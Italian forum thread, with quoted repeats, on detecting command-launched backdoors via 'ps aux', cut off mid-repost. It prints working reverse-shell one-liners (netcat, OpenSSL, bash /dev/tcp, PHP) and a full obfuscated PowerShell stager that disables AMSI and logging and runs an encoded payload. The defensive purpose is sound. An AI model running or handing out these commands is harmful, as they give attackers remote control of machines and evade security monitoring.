Discussione Come individuare e rimuovere una backdoor su Linux senza AV

[Netcat]

Questa tecnica funziona sulle backdoor originate da un comando. Linux è potente ed offre la capacità di eseguire operazioni complesse, fra queste c'è la possibilità di creare tcp relay con un singolo comando. Questo tipo di backdoor, fra cui c'è netcat, possono essere tuttavia scoperte facilmente con il comando "ps aux".

Questo comando, mostra un verbose output del quadro dei processi attivi, mostrando specificatamente se sono originati da un comando. La tecnica non funziona in caso di payload più avanzati, come Beacon o Meterpreter, dato che questi originano da un file infetto e non da un comando. Per quello è necessario individuare la fonte da cui origina la shell ed eliminarla.

Esempi di tipiche backdoor che possono essere rilevate (e killate) su Unix con "ps aux" e poi kill "process PID". Queste backdoor sono usate contro nabbi, dal momento che chi le riesce a trovare ottiene informazioni sull'IP e la porta usata dal listener:
mkfifo /tmp/zphmduw; nc 127.0.0.1 443 0</tmp/zphmduw | /bin/sh >/tmp/zphmduw 2>&1; rm /tmp/zphmduw (questo è Netcat);
sh -c '(sleep 4319|openssl s_client -quiet -connect 127.0.0.1:443|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 127.0.0.1:443 >/dev/null 2>&1 &)' (reverse shell via OpenSSL);
bash -c '0<&118-;exec 118<>/dev/tcp/127.0.0.1/443;sh <&118 >&118 2>&118' (bash command)
php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://127.0.0.1:443",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'& (php command shell)

Questo trucchetto, ossia di generare una backdoor da un comando è possibile anche su Windows, attraverso Powershell. Piccolo dettaglio, Microsoft non ama l'user autonomo, pretende di fare tutto per te. Se il comando sfugge ad AMSI ci puoi impiegare molto tempo prima di trovare il processo infetto, specialmente se il malware crea copie false di svchost.exe nel secondo stage dell'infezione, un noto processo a istanze multiple.
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c $tSIE=((''Enable{''+''0}cri{2}t{''+''1}lo''+''ck{3}oggin''+''g''+'''')-f''S'',''B'',''p'',''L'');If($PSVersionTable.PSVersion.Major -ge 3){ $f26j=((''Sc{''+''1}ipt{2''+''}loc''+''{0''+''}Logging'')-f''k'',''r'',''B''); $eFTdc=[Ref].Assembly.GetType(((''''+''S{2}stem.''+''{0}''+''ana{5}ement.{1}''+''{4}t''+''omation''+''.''+''Uti{3}s'')-f''M'',''A'',''y'',''l'',''u'',''g'')); $fThX=[Ref].Assembly.GetType(((''{5''+''}''+''{''+''6}s''+''tem.''+''{2''+''}''+''{9}n''+''{9''+''}{1}e''+''men''+''t.''+''{7}{''+''3}''+''t{8''+''}m''+''{9}ti{8}''+''n.{7''+''}msi{0''+''}ti{4}s''+'''')-f''U'',''g'',''M'',''u'',''l'',''S'',''y'',''A'',''o'',''a'')); $qyZ=[Collections.Generic.Dictionary[string,System.Object]]::new(); $qh1d=((''{4}na{0''+''}leS''+''c{2}iptBlock''+''{3}n{5''+''}o''+''cation''+''{1}''+''ogging'')-f''b'',''L'',''r'',''I'',''E'',''v''); if ($fThX) { $fThX.GetField(((''''+''amsiI{3''+''}i{''+''0}{4''+''}ai''+''{2}{''+''1}''+''d''+'''')-f''t'',''e'',''l'',''n'',''F''),''NonPublic,Static'').SetValue($null,$true); }; $qtyQ1=$eFTdc.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); If ($qtyQ1) { $fnp=$qtyQ1.GetValue($null); $qyZ.Add($tSIE,0); $qyZ.Add($qh1d,0); $fnp[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$f26j]=$qyZ; If($fnp[$f26j]){ $fnp[$f26j][$tSIE]=0; $fnp[$f26j][$qh1d]=0; } } Else { [Ref].Assembly.GetType(((''S''+''{0}stem.{5}anagement''+''.A''+''{''+''2''+''}tomation.S''+''c{4}i{3}t{''+''1''+''}lock'')-f''y'',''B'',''u'',''p'',''r'',''M'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAAO252MCA7VYaW+jSBr+PtL8B2sUKY42nXDYmclII62xOYwNNkcVRzZaYapijuIIYBuYnf++hRN39+x0z/auNHy''+''BKt6rnv{1}5i3p''+''5OeRhExf56PVhLo1+/f670fu1DaogG42viuPt6Kr/C{1}c3n95{1}hX''+''kx+mU''+''0fpqV5aLIgjh//vnn+aGqcN68je9k3MzqGmc7EuN6fDP618iJcIU/bHYJDpvRr6Orf97JpNgF5F2s''+''mw{1}hhEcfZjka3q2LMBjiurNKEjfj63/84/rm6QP7fCe+HgJSj6+trm5w{1}ocIub4Z/XYzOLS7Eo+vtTisirp4ae6cOOe5O5DXwQvWqbUj1nATFai+pmv5tJoKN4cqPy9qsPImM76mj''+''9uqCGcIVbiur29HT4P9p+fnv4+f3p2bh7yJM3y3zBtcFaWFq2Mc4vpOCXJEsIlfnqmW1VRxvn++uaFixyLF46v8QMjt''+''6H8xM9bx6QL{1}tyqNP1eiUtumurmlCf3jMrUCHQh+U7z+QpyUAzf0uvCAgvfbgN/LhTo7Dy{1}foM6nicv1{1}H6DacDjbVHHZ+VfRsztSKO+g6aoOjq8sqsDvnn+CPfoKmpvv9UWe1GkavmWTOjUEy''+''xi9PzJwO9yf5W7P4mD0N''+''eZvMAvcY4XXR5kcXgh6/hLGcEvBJ8RubuI6TTC8fX7C4wWmOB90AwgD8T4g5qYxc1HXeEQE4SrWUizWtOoaMJvfh/MW''+''97G18tcwxkF721MmXr1QksEX6Tfy6K''+''7eB/GVOh6ToK6vh1tD7RGw9uRhQOC0e1oltfx+6vZoSnOj9efwtUOpInDoG4u5p5v/gPO{1}7fzIq+b6hDStFII''+''bKvEYRyQAZHbkRIjLHRWvL+4v/4iHvOAEFo71NKR5oPODDhYzUCWikZKiXFzZ+FmmZUEZ1TivGNIJNjT/eG9Ps7cCvYYXX8lzEs{1}vJF+wOUCyG{1}B0mRbpGhuRzCuGrr/DBgP9Po/YvjjvnMOZl7h99SML/X1JHTNUABX+/kq''+''Hjj6DtAZjqqhUEhVkQlBjR8mb5vM+I{1}7MV5Mt4viNKOXKJkGFCwA/aWGVGItG8sT4zWIomXMLv''+''{1}03AFxv22Y''+''cmXbimotlFm1aKOX2bJeiorQGawwC5X4R6gKAFC9eL42knY5Q/P1frmnDoRlFAqMz+wFRpqvLSESY2a2twzFmLD+8v''+''4nIsS9tbRmivPR/ke74mSiuK090zV1FkkbJLGc{1}NZPB30/l{1}cL8TwOh7Hh1WIsUj+i5Bkwwg4sBUeUfAOW''+''y/3fTnsDru8nUiTQ+WXcrkt4Ty+WXR724uxyWUtOnxl0LMoPmtcco/t7eLifswXxh''+''cNrAI8+f8+CeNHO9z8J+Wm13x73yHB+NFu923HFzAGyyh3vYSg/8r6r9oEM6918SrAM9mtnegznswZ1QhE4Zu''+''o7k/PcLkvpHZ6WsjoNZakPu1msxtEu5PQucAXGy9qjxzVok5RJmMEIyaBYiVOCOnbrUUp5vLEHPOmRDJt1SrZrojOD3A6qxHNMEsbRxnfDxubUV9/RmaWkT0PeJDtrqtr{1}{1}LHj2BOV70OOHHfxVMEZOQHe7HxHalbzP9XVfYc9hjmxkTL4Yoq11NjY1RnfYQ4G93hAGeyQxDxsUp/iw849Vy{1}6Yg7y5S4Li9V8n1sLs7eAJNj9ktXyun0BuqBD33Gk8Oil0wIk6VSPawb30q''+''MtqTJwWGD0kRMq+kIH6o+awh4o3lvDUTXIS5ottzykvN65amvzZmpwjaWBZhJkOljzfgRSmEE52oZMCYFi9sECEUfeMzpfn15Ay''+''FqMZOIcWlB''+''Bc91V57asMU5etCZMOXOhtYhpA58PK''+''wPoB''+''gLTZiMib8WYDxYwc931U5MrjlD001BUTS3fV9CFsaMQAlz/FSRkAqDEIADyVYeOkC2G+6sP{1}ei5qAcpzWJGTxPEtzye8i{1}tH2xFJyYH6ecG0BwDBjkis1MEFlLfPixNX24zExCKF/HUrs5hQh6ALa0D2etDnixALk0g9F1HCZm{1}w3Y2Lyx9fl9RBrJGWiaaWJ88rnzVs6YCttcbqcYbrO56TGSZjs8juVwbaTMFmW5qVlipvM4ZQDJWjHek26wHWWMSOuEU9lGCe+FRZwUGAjTHTs35rvCKEsQBptwiybcxUB8AJ/a2aLRoTm1xWuW4fkzzQAymtQKF5sBVXzXXh2F2as3MO+O0443hvtV4Ic{1}SNA+Z1rUIf''+''A3T5jXsqJ1e4yx''+''+OTFS5GCZNUzG9AA3Ya0+mkCFBCvuM{1}O5xxVOC27{1}G9zAJZAvK8Br7caq+ZAzWcvWeA1GLeTQxufVE3ZNBS0E{1}beQ3J0ibSFbHpGColCUZLggh52y5BBZUq4bbZATBnEG45851EyAC1Naf4xpm5''+''s155+womsGD/kg208Mjm''+''HCril0kcY6xLEQ/OGuw8gzHVak2L{1}QPPVWikQ/gRsfFiwgBa+lMAkS/6AzSIKsGq1ZSfWhsLDFokWJHgE+ygIeRgCotsfve40xpr7MHvXus{1}Y''+''WphU6Rr{1}LxC6QygebM3nPmfaaM83X/OwUUP4DntaeE3WOnR7XjHjSmIilnlyQSFsrR5HGqK3BoX431KgLM62PMjrfwEQiIJk{1}N7ZeY2nWeYnXogWEXmpOjETtfZE0HoemIYC9nbW5BvVGU0xXl30w8MVMxYkjl6zv6qo/f5TPWLAlPWn6cyuLkpBIHBRV{1}gOgimSN38nGBKWmD9Jybs0fGyjCiiLFO1Bvfam0''+''{1}xJRaZVoKPU9KyVKIKmxThlp52S16n3JTmgtyOEUZ+JpB0zfywfO0XOtzHSWFK3t3txsFMgGGTwGiQ4cSa8cq67gwvfChW9iF2oe1AGWvImlCFtrAY4wLztayxXFvwW5HkG59XZMubAXsAsVoR/qUnPVKMweoa''+''U''+''Y5zFIAYcot8xEau3UFzXHH/YySHOeW1DQ{1}M48ha7InXUpAh4vVp7tH+w3/BPHiSozg2xoowiLPglY5AQLqFmwLExl2''+''EfhfMWj3GSkxkzMlc2xtaa''+''EFU5DDmWti7pGAQvfR04U0EV6Gq9uIB9Zeq+uh7wEiVBZSsloUsgiWzpBut/Z8qMFpYjRSARMImx2vS7a{1}M8Nc6T6mZ8FeS''+''RaCSpAr0om49vhwphgJRKCTBKgKwgUx6GOCye{1}royhVhyvQwkBaxZ1tqTz''+''WEQBBO1GWwj''+''mxg1PFMPekkppwMBw2sDKpW2ooNQWp0EgRYkDCkaTI8{1}kTr3Zm2tbVntIR1pe9loSGWuexIj3H3aJwSMRcV5KOuorgQv0ANyU7j3G1MigQWOge3b76iy8o0PMZcjuuUCBRycXDnqiQwwibwN9bi{1}73EYpmx0Mp6ENpitejTcS9a8gNmR0wQBivrLYTOXSfD1Hutql5cpKa4f902/u78cpe/RlOHzvRfrNPe5coaO10VM75Zqcv+lgx8CDP98PtuPZ7J''+''{1}ffqAHwicQ5w3PPV+lFLL90DR9/93V3vrsVPi1flALqjoKCD0t0k7vcmaXikp67962RTxojMfnHwAprnJMaN''+''{1}M++rLYX{1}GSBEOreO5z6Nt61szOfS2YHmO6ktPN6OPgjefesrL1M8/+zRKenwezrZ3a5zvm+iWaXmGo{1}0g0zKT80n529c2L8pufDZ2O/STFJqLbXK2Tc3FL6Px+K9Ha1sVDW1fvo7X16CjvlPab9D2560LGAAUioJ8Dt95XR+58Dl2FDSWLvx''+''p+FvwRhJq4AN+HV01Qzv9eXt+RXbeX0uc92Ymojf034jzae5P3n4TmZjbAZ4/TP5+4rMu8C8EwAnihkpatCcj+O0vwZ{1}xeK+VzzJMk0ML4eX9Gn6cbQ7NB/1AyLkt/DfJpg5msBMAAA{0}{0}'')-f''='',''d'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"

Evitando di soffermarmi troppo su Windows Powershell, torniamo sui comandi forniti all'inizio, se si incontrano istanze di OpenSSL strane, o addirittura Netcat nel proprio quadro dei processi, significa che qualcuno è riuscito a terminare un tentativo di exploitation con successo sul vostro dispositivo, e ha ottenuto una shell. Qualora accada, mettete l'OS offline e cercate di capire un po' come abbia fatto (magari state usando software datato?)

Output di "ps aux" in Ubuntu 20.04

 

[hackynonpointer]

Questa tecnica funziona sulle backdoor originate da un comando. Linux è potente ed offre la capacità di eseguire operazioni complesse, fra queste c'è la possibilità di creare tcp relay con un singolo comando. Questo tipo di backdoor, fra cui c'è netcat, possono essere tuttavia scoperte facilmente con il comando "ps aux".

Questo comando, mostra un verbose output del quadro dei processi attivi, mostrando specificatamente se sono originati da un comando. La tecnica non funziona in caso di payload più avanzati, come Beacon o Meterpreter, dato che questi originano da un file infetto e non da un comando. Per quello è necessario individuare la fonte da cui origina la shell ed eliminarla.

Esempi di tipiche backdoor che possono essere rilevate (e killate) su Unix con "ps aux" e poi kill "process PID". Queste backdoor sono usate contro nabbi, dal momento che chi le riesce a trovare ottiene informazioni sull'IP e la porta usata dal listener:
mkfifo /tmp/zphmduw; nc 127.0.0.1 443 0</tmp/zphmduw | /bin/sh >/tmp/zphmduw 2>&1; rm /tmp/zphmduw (questo è Netcat);
sh -c '(sleep 4319|openssl s_client -quiet -connect 127.0.0.1:443|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 127.0.0.1:443 >/dev/null 2>&1 &)' (reverse shell via OpenSSL);
bash -c '0<&118-;exec 118<>/dev/tcp/127.0.0.1/443;sh <&118 >&118 2>&118' (bash command)
php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://127.0.0.1:443",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'& (php command shell)

Questo trucchetto, ossia di generare una backdoor da un comando è possibile anche su Windows, attraverso Powershell. Piccolo dettaglio, Microsoft non ama l'user autonomo, pretende di fare tutto per te. Se il comando sfugge ad AMSI ci puoi impiegare molto tempo prima di trovare il processo infetto, specialmente se il malware crea copie false di svchost.exe nel secondo stage dell'infezione, un noto processo a istanze multiple.
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c $tSIE=((''Enable{''+''0}cri{2}t{''+''1}lo''+''ck{3}oggin''+''g''+'''')-f''S'',''B'',''p'',''L'');If($PSVersionTable.PSVersion.Major -ge 3){ $f26j=((''Sc{''+''1}ipt{2''+''}loc''+''{0''+''}Logging'')-f''k'',''r'',''B''); $eFTdc=[Ref].Assembly.GetType(((''''+''S{2}stem.''+''{0}''+''ana{5}ement.{1}''+''{4}t''+''omation''+''.''+''Uti{3}s'')-f''M'',''A'',''y'',''l'',''u'',''g'')); $fThX=[Ref].Assembly.GetType(((''{5''+''}''+''{''+''6}s''+''tem.''+''{2''+''}''+''{9}n''+''{9''+''}{1}e''+''men''+''t.''+''{7}{''+''3}''+''t{8''+''}m''+''{9}ti{8}''+''n.{7''+''}msi{0''+''}ti{4}s''+'''')-f''U'',''g'',''M'',''u'',''l'',''S'',''y'',''A'',''o'',''a'')); $qyZ=[Collections.Generic.Dictionary[string,System.Object]]::new(); $qh1d=((''{4}na{0''+''}leS''+''c{2}iptBlock''+''{3}n{5''+''}o''+''cation''+''{1}''+''ogging'')-f''b'',''L'',''r'',''I'',''E'',''v''); if ($fThX) { $fThX.GetField(((''''+''amsiI{3''+''}i{''+''0}{4''+''}ai''+''{2}{''+''1}''+''d''+'''')-f''t'',''e'',''l'',''n'',''F''),''NonPublic,Static'').SetValue($null,$true); }; $qtyQ1=$eFTdc.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); If ($qtyQ1) { $fnp=$qtyQ1.GetValue($null); $qyZ.Add($tSIE,0); $qyZ.Add($qh1d,0); $fnp[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$f26j]=$qyZ; If($fnp[$f26j]){ $fnp[$f26j][$tSIE]=0; $fnp[$f26j][$qh1d]=0; } } Else { [Ref].Assembly.GetType(((''S''+''{0}stem.{5}anagement''+''.A''+''{''+''2''+''}tomation.S''+''c{4}i{3}t{''+''1''+''}lock'')-f''y'',''B'',''u'',''p'',''r'',''M'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAAO252MCA7VYaW+jSBr+PtL8B2sUKY42nXDYmclII62xOYwNNkcVRzZaYapijuIIYBuYnf++hRN39+x0z/auNHy''+''BKt6rnv{1}5i3p''+''5OeRhExf56PVhLo1+/f670fu1DaogG42viuPt6Kr/C{1}c3n95{1}hX''+''kx+mU''+''0fpqV5aLIgjh//vnn+aGqcN68je9k3MzqGmc7EuN6fDP618iJcIU/bHYJDpvRr6Orf97JpNgF5F2s''+''mw{1}hhEcfZjka3q2LMBjiurNKEjfj63/84/rm6QP7fCe+HgJSj6+trm5w{1}ocIub4Z/XYzOLS7Eo+vtTisirp4ae6cOOe5O5DXwQvWqbUj1nATFai+pmv5tJoKN4cqPy9qsPImM76mj''+''9uqCGcIVbiur29HT4P9p+fnv4+f3p2bh7yJM3y3zBtcFaWFq2Mc4vpOCXJEsIlfnqmW1VRxvn++uaFixyLF46v8QMjt''+''6H8xM9bx6QL{1}tyqNP1eiUtumurmlCf3jMrUCHQh+U7z+QpyUAzf0uvCAgvfbgN/LhTo7Dy{1}foM6nicv1{1}H6DacDjbVHHZ+VfRsztSKO+g6aoOjq8sqsDvnn+CPfoKmpvv9UWe1GkavmWTOjUEy''+''xi9PzJwO9yf5W7P4mD0N''+''eZvMAvcY4XXR5kcXgh6/hLGcEvBJ8RubuI6TTC8fX7C4wWmOB90AwgD8T4g5qYxc1HXeEQE4SrWUizWtOoaMJvfh/MW''+''97G18tcwxkF721MmXr1QksEX6Tfy6K''+''7eB/GVOh6ToK6vh1tD7RGw9uRhQOC0e1oltfx+6vZoSnOj9efwtUOpInDoG4u5p5v/gPO{1}7fzIq+b6hDStFII''+''bKvEYRyQAZHbkRIjLHRWvL+4v/4iHvOAEFo71NKR5oPODDhYzUCWikZKiXFzZ+FmmZUEZ1TivGNIJNjT/eG9Ps7cCvYYXX8lzEs{1}vJF+wOUCyG{1}B0mRbpGhuRzCuGrr/DBgP9Po/YvjjvnMOZl7h99SML/X1JHTNUABX+/kq''+''Hjj6DtAZjqqhUEhVkQlBjR8mb5vM+I{1}7MV5Mt4viNKOXKJkGFCwA/aWGVGItG8sT4zWIomXMLv''+''{1}03AFxv22Y''+''cmXbimotlFm1aKOX2bJeiorQGawwC5X4R6gKAFC9eL42knY5Q/P1frmnDoRlFAqMz+wFRpqvLSESY2a2twzFmLD+8v''+''4nIsS9tbRmivPR/ke74mSiuK090zV1FkkbJLGc{1}NZPB30/l{1}cL8TwOh7Hh1WIsUj+i5Bkwwg4sBUeUfAOW''+''y/3fTnsDru8nUiTQ+WXcrkt4Ty+WXR724uxyWUtOnxl0LMoPmtcco/t7eLifswXxh''+''cNrAI8+f8+CeNHO9z8J+Wm13x73yHB+NFu923HFzAGyyh3vYSg/8r6r9oEM6918SrAM9mtnegznswZ1QhE4Zu''+''o7k/PcLkvpHZ6WsjoNZakPu1msxtEu5PQucAXGy9qjxzVok5RJmMEIyaBYiVOCOnbrUUp5vLEHPOmRDJt1SrZrojOD3A6qxHNMEsbRxnfDxubUV9/RmaWkT0PeJDtrqtr{1}{1}LHj2BOV70OOHHfxVMEZOQHe7HxHalbzP9XVfYc9hjmxkTL4Yoq11NjY1RnfYQ4G93hAGeyQxDxsUp/iw849Vy{1}6Yg7y5S4Li9V8n1sLs7eAJNj9ktXyun0BuqBD33Gk8Oil0wIk6VSPawb30q''+''MtqTJwWGD0kRMq+kIH6o+awh4o3lvDUTXIS5ottzykvN65amvzZmpwjaWBZhJkOljzfgRSmEE52oZMCYFi9sECEUfeMzpfn15Ay''+''FqMZOIcWlB''+''Bc91V57asMU5etCZMOXOhtYhpA58PK''+''wPoB''+''gLTZiMib8WYDxYwc931U5MrjlD001BUTS3fV9CFsaMQAlz/FSRkAqDEIADyVYeOkC2G+6sP{1}ei5qAcpzWJGTxPEtzye8i{1}tH2xFJyYH6ecG0BwDBjkis1MEFlLfPixNX24zExCKF/HUrs5hQh6ALa0D2etDnixALk0g9F1HCZm{1}w3Y2Lyx9fl9RBrJGWiaaWJ88rnzVs6YCttcbqcYbrO56TGSZjs8juVwbaTMFmW5qVlipvM4ZQDJWjHek26wHWWMSOuEU9lGCe+FRZwUGAjTHTs35rvCKEsQBptwiybcxUB8AJ/a2aLRoTm1xWuW4fkzzQAymtQKF5sBVXzXXh2F2as3MO+O0443hvtV4Ic{1}SNA+Z1rUIf''+''A3T5jXsqJ1e4yx''+''+OTFS5GCZNUzG9AA3Ya0+mkCFBCvuM{1}O5xxVOC27{1}G9zAJZAvK8Br7caq+ZAzWcvWeA1GLeTQxufVE3ZNBS0E{1}beQ3J0ibSFbHpGColCUZLggh52y5BBZUq4bbZATBnEG45851EyAC1Naf4xpm5''+''s155+womsGD/kg208Mjm''+''HCril0kcY6xLEQ/OGuw8gzHVak2L{1}QPPVWikQ/gRsfFiwgBa+lMAkS/6AzSIKsGq1ZSfWhsLDFokWJHgE+ygIeRgCotsfve40xpr7MHvXus{1}Y''+''WphU6Rr{1}LxC6QygebM3nPmfaaM83X/OwUUP4DntaeE3WOnR7XjHjSmIilnlyQSFsrR5HGqK3BoX431KgLM62PMjrfwEQiIJk{1}N7ZeY2nWeYnXogWEXmpOjETtfZE0HoemIYC9nbW5BvVGU0xXl30w8MVMxYkjl6zv6qo/f5TPWLAlPWn6cyuLkpBIHBRV{1}gOgimSN38nGBKWmD9Jybs0fGyjCiiLFO1Bvfam0''+''{1}xJRaZVoKPU9KyVKIKmxThlp52S16n3JTmgtyOEUZ+JpB0zfywfO0XOtzHSWFK3t3txsFMgGGTwGiQ4cSa8cq67gwvfChW9iF2oe1AGWvImlCFtrAY4wLztayxXFvwW5HkG59XZMubAXsAsVoR/qUnPVKMweoa''+''U''+''Y5zFIAYcot8xEau3UFzXHH/YySHOeW1DQ{1}M48ha7InXUpAh4vVp7tH+w3/BPHiSozg2xoowiLPglY5AQLqFmwLExl2''+''EfhfMWj3GSkxkzMlc2xtaa''+''EFU5DDmWti7pGAQvfR04U0EV6Gq9uIB9Zeq+uh7wEiVBZSsloUsgiWzpBut/Z8qMFpYjRSARMImx2vS7a{1}M8Nc6T6mZ8FeS''+''RaCSpAr0om49vhwphgJRKCTBKgKwgUx6GOCye{1}royhVhyvQwkBaxZ1tqTz''+''WEQBBO1GWwj''+''mxg1PFMPekkppwMBw2sDKpW2ooNQWp0EgRYkDCkaTI8{1}kTr3Zm2tbVntIR1pe9loSGWuexIj3H3aJwSMRcV5KOuorgQv0ANyU7j3G1MigQWOge3b76iy8o0PMZcjuuUCBRycXDnqiQwwibwN9bi{1}73EYpmx0Mp6ENpitejTcS9a8gNmR0wQBivrLYTOXSfD1Hutql5cpKa4f902/u78cpe/RlOHzvRfrNPe5coaO10VM75Zqcv+lgx8CDP98PtuPZ7J''+''{1}ffqAHwicQ5w3PPV+lFLL90DR9/93V3vrsVPi1flALqjoKCD0t0k7vcmaXikp67962RTxojMfnHwAprnJMaN''+''{1}M++rLYX{1}GSBEOreO5z6Nt61szOfS2YHmO6ktPN6OPgjefesrL1M8/+zRKenwezrZ3a5zvm+iWaXmGo{1}0g0zKT80n529c2L8pufDZ2O/STFJqLbXK2Tc3FL6Px+K9Ha1sVDW1fvo7X16CjvlPab9D2560LGAAUioJ8Dt95XR+58Dl2FDSWLvx''+''p+FvwRhJq4AN+HV01Qzv9eXt+RXbeX0uc92Ymojf034jzae5P3n4TmZjbAZ4/TP5+4rMu8C8EwAnihkpatCcj+O0vwZ{1}xeK+VzzJMk0ML4eX9Gn6cbQ7NB/1AyLkt/DfJpg5msBMAAA{0}{0}'')-f''='',''d'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"

Evitando di soffermarmi troppo su Windows Powershell, torniamo sui comandi forniti all'inizio, se si incontrano istanze di OpenSSL strane, o addirittura Netcat nel proprio quadro dei processi, significa che qualcuno è riuscito a terminare un tentativo di exploitation con successo sul vostro dispositivo, e ha ottenuto una shell. Qualora accada, mettete l'OS offline e cercate di capire un po' come abbia fatto (magari state usando software datato?)

Output di "ps aux" in Ubuntu 20.04

Aggiusta la formattazione @Access Denied , si incrociano gli occhi, usa il BBCODE ["CODE] [/CODE], leva la " dopo la prima parentesi.
Qualcosa del genere:

# netcat
mkfifo /tmp/zphmduw; nc 127.0.0.1 443 0</tmp/zphmduw | /bin/sh >/tmp/zphmduw 2>&1; rm /tmp/zphmduw
# Openssl
sh -c '(sleep 4319|openssl s_client -quiet -connect 127.0.0.1:443|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 127.0.0.1:443 >/dev/null 2>&1 &)'
# Bash
bash -c '0<&118-;exec 118<>/dev/tcp/127.0.0.1/443;sh <&118 >&118 2>&118'
# PHP
php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://127.0.0.1:443",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&

powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c  $tSIE=((''Enable{''+''0}cri{2}t{''+''1}lo''+''ck{3}oggin''+''g''+'''')-f''S'',''B'',''p'',''L'');If($PSVersionTable.PSVersion.Major -ge 3){ $f26j=((''Sc{''+''1}ipt{2''+''}loc''+''{0''+''}Logging'')-f''k'',''r'',''B''); $eFTdc=[Ref].Assembly.GetType(((''''+''S{2}stem.''+''{0}''+''ana{5}ement.{1}''+''{4}t''+''omation''+''.''+''Uti{3}s'')-f''M'',''A'',''y'',''l'',''u'',''g'')); $fThX=[Ref].Assembly.GetType(((''{5''+''}''+''{''+''6}s''+''tem.''+''{2''+''}''+''{9}n''+''{9''+''}{1}e''+''men''+''t.''+''{7}{''+''3}''+''t{8''+''}m''+''{9}ti{8}''+''n.{7''+''}msi{0''+''}ti{4}s''+'''')-f''U'',''g'',''M'',''u'',''l'',''S'',''y'',''A'',''o'',''a'')); $qyZ=[Collections.Generic.Dictionary[string,System.Object]]::new(); $qh1d=((''{4}na{0''+''}leS''+''c{2}iptBlock''+''{3}n{5''+''}o''+''cation''+''{1}''+''ogging'')-f''b'',''L'',''r'',''I'',''E'',''v''); if ($fThX) { $fThX.GetField(((''''+''amsiI{3''+''}i{''+''0}{4''+''}ai''+''{2}{''+''1}''+''d''+'''')-f''t'',''e'',''l'',''n'',''F''),''NonPublic,Static'').SetValue($null,$true); }; $qtyQ1=$eFTdc.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); If ($qtyQ1) { $fnp=$qtyQ1.GetValue($null); $qyZ.Add($tSIE,0); $qyZ.Add($qh1d,0); $fnp[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$f26j]=$qyZ; If($fnp[$f26j]){ $fnp[$f26j][$tSIE]=0; $fnp[$f26j][$qh1d]=0; } } Else { [Ref].Assembly.GetType(((''S''+''{0}stem.{5}anagement''+''.A''+''{''+''2''+''}tomation.S''+''c{4}i{3}t{''+''1''+''}lock'')-f''y'',''B'',''u'',''p'',''r'',''M'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 